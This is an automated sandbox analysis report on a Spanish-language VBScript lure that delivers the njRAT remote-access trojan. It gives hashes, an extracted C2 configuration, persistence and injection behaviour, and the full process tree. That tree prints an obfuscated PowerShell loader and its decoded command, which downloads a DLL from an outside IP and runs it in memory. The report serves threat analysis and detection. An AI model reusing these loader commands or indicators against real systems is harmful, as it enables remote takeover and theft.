Analysis
max time kernel: 146s
max time network: 144s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220721-en locale:en-us os:windows10-2004-x64 system
submitted: 11/08/2022, 14:55

Static task: static1
Behavioral task: behavioral1
Sample: Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs
Resource: win7-20220715-en
General
Target: Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs
Size: 205KB
MD5: 173a182f65910267fa0e8590dd0cfc0e
SHA1: 3b8bf6b2f4ad725511fca0e0198b4499c75fe86c
SHA256: 49bb9b1be17a3b590a8cb4245e1a3f07fb13648676ff7e0240f3030678c503d6
SHA512: 44d5a9a9d2166253c2af4b8820f323d29a2cd7042a3408440bd86b8422d25a28006891ca9f690d756271e85d09965047c2eebcbd18b5af8a378ff0785924900d
Malware Config
Extracted:
  http://91.241.19.49/ARTS/dllf3txt
Extracted:
  njrat
  0.7NC
  NYAN CAT
  wibnj.duckdns.org:57831
  549d524552
  reg_key: 549d524552
  splitter: @!#&^%$
Signatures
Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  4 | 4724 | powershell.exe
Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | WScript.exe
Drops startup file (2 IoCs)
  description | ioc | Process
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&%$5tBTDY()R0%$#HFJfb.vbs | powershell.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&%$5tBTDY()R0%$#HFJfb.vbs | powershell.exe
Suspicious use of SetThreadContext (1 IoCs)
  description | pid | Process | procid_target
  PID 4724 set thread context of 4416 | 4724 | powershell.exe | 88

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | Process
  956 | powershell.exe
  956 | powershell.exe
  4724 | powershell.exe
  4724 | powershell.exe
Suspicious use of AdjustPrivilegeToken (37 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 956 | powershell.exe
  Token: SeDebugPrivilege | 4724 | powershell.exe
  Token: SeDebugPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
  Token: 33 | 4416 | RegSvcs.exe
  Token: SeIncBasePriorityPrivilege | 4416 | RegSvcs.exe
Suspicious use of WriteProcessMemory (12 IoCs)
  description | pid | Process | procid_target
  PID 4824 wrote to memory of 956 | 4824 | WScript.exe | 84
  PID 4824 wrote to memory of 956 | 4824 | WScript.exe | 84
  PID 956 wrote to memory of 4724 | 956 | powershell.exe | 86
  PID 956 wrote to memory of 4724 | 956 | powershell.exe | 86
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
  PID 4724 wrote to memory of 4416 | 4724 | powershell.exe | 88
Processes
C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4824

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACYAJQAkAD⌚⌚⌚AdABCAFQARABZACgAKQBSADAAJQAkACMAIgBIAEYASgBmAGIAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 956

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '&%$5tBTDY()R0%$#"HFJfb' ))"
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4724

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious use of AdjustPrivilegeToken
        PID: 4416
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 3KB
  MD5: f41839a3fe2888c8b3050197bc9a0a05
  SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
  SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
- Filesize: 64B
  MD5: a6c9d692ed2826ecb12c09356e69cc09
  SHA1: def728a6138cf083d8a7c61337f3c9dade41a37f
  SHA256: a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
  SHA512: 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3